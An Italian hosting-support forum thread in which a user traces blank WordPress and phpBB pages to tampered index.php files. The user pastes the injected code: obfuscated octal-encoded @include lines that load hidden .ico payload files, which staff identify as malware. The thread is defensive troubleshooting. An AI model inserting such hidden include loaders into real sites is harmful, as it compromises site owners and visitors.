Visualizzazione risultati 1 fino 8 di 8

Discussione: Pagine Bianche al posto del sito

  1. #1
    Simone88 non è connesso Utente giovane
    Data registrazione
    19-02-2006
    Residenza
    Roma
    Messaggi
    50

    Exclamation Pagine Bianche al posto del sito

    Ciao ragazzi, è da un pò di tempo che il mio sito simone88.altervista.org ha pagine bianche invece che i miei script (wordpress e phpbb). Dalla Dashboard di altervista sembra tutto ok a mio parere.
    Come posso risolvere il problema?? il sito è stato attaccato da qualche tipo di attacco e quindi è stato disattivato in qualche modo???
    Qualche altro utente ha avuto il mio stesso problema?? solo pagine bianche....

    Grazie Mille

  2. #2
    L'avatar di alemoppo
    alemoppo non è connesso Staff AV
    Data registrazione
    24-08-2008
    Residenza
    PU / BO
    Messaggi
    22,067

    Predefinito

    Se hai alterSito, prova disabilitando tutti i plugin ed impostando un tema funzionante (vedi qui).

    Ciao!

  3. #3
    Simone88 non è connesso Utente giovane
    Data registrazione
    19-02-2006
    Residenza
    Roma
    Messaggi
    50

    Predefinito

    Ciao, e grazie per la risposta, ma purtroppo non è questo il problema, le pagine bianche me le da anche su forum phpbb, quindi deve esser qualcosa di diverso che incompatibilità dei plugin, comunque per scrupolo ho eliminato la cartella plugin di wp ma nulla!

    Grazie lo stesso! aspetto qualcuno dello staff please..

  4. #4
    L'avatar di alemoppo
    alemoppo non è connesso Staff AV
    Data registrazione
    24-08-2008
    Residenza
    PU / BO
    Messaggi
    22,067

    Predefinito

    Puoi riportare il contenuto del file index.php del blog e del forum?

    Ciao!

  5. #5
    Simone88 non è connesso Utente giovane
    Data registrazione
    19-02-2006
    Residenza
    Roma
    Messaggi
    50

    Predefinito

    Ciao e grazie per l'illuminazione... Ho visto il file index delle due piattaforme e hanno al loro interno un codice senza senso (a parer mio) e che non so come possa esser successo. Tutti e due i file index.php sono stati modificati NON DA ME.
    Il file è d3l tipo
    Codice PHP:
    <?php
    /*6b64e*/

    @include "\057mem\142ri/\163imo\156e88\057blo\147/wp\055inc\154ude\163/Te\170t/.\067ebf\064a89\056ico";

    /*6b64e*/
    /*99051*/

    @include "\057me\155br\151/s\151mo\156e8\070/w\160-c\157nt\145nt\057up\154oa\144s/\167pa\154li\155po\162t/\0568a\14360\0602b\056ic\157";

    /*99051*/



    ?>
    Ho modificato il file index.php con quello originale do WP e adesso finalmente tutto funziona. L'unico problema è sul forum al quale avevo applicato parecchie MOD e devo riuscire a trovare un vecchio file di backup.
    Cosa ne pensate, sono stato preso sotto attacco da qualche virus? È gia successo che il file index.php venisse sostituito all'insaputa?
    Grazie ancora per la risposta che mi ha fatto arrivare alla soluzione.

  6. #6
    karl94 non è connesso Staff AV
    Data registrazione
    03-10-2005
    Messaggi
    17,744

    Predefinito

    Si tratta evidentemente di compromissione da malware. Hai aggiornato regolarmente i vari CMS installati sul tuo spazio web?

  7. #7
    Simone88 non è connesso Utente giovane
    Data registrazione
    19-02-2006
    Residenza
    Roma
    Messaggi
    50

    Predefinito

    Ciao, scusami per il ritardo ma non ricevo le notifiche di risposta ai post. Comunque in teoria l'unico cms che non aggiorno mai è il forum, perchè è una versione super moddata da me ma è su base della vecchia 2.x quando phpbb è passata alla 3 aveva cambiato radicalmente lo script quindi non ho potuto continuare la modifica. Avevo installato alcune mod per proteggere il forum da attacchi malware, ma evidentemente non sono abbastate. Quindi sono arrivato al giro di boa.. Devo spostare tutto su una nuova versione..
    Anche se mi dispiace perchè all'epoca avevo passato molto tempo a stravolgere la versione base di phpbb.

  8. #8
    L'avatar di alemoppo
    alemoppo non è connesso Staff AV
    Data registrazione
    24-08-2008
    Residenza
    PU / BO
    Messaggi
    22,067

    Predefinito

    Citazione Originalmente inviato da Simone88 Visualizza messaggio
    Avevo installato alcune mod per proteggere il forum da attacchi malware
    Più cose installi e più rischi che ci siano problemi nel codice. Evita di installare cose aggiuntive e mantieni aggiornato sempre i vari applicativi.

    Ciao!

Regole di scrittura

  • Non puoi creare nuove discussioni
  • Non puoi rispondere ai messaggi
  • Non puoi inserire allegati.
  • Non puoi modificare i tuoi messaggi
  •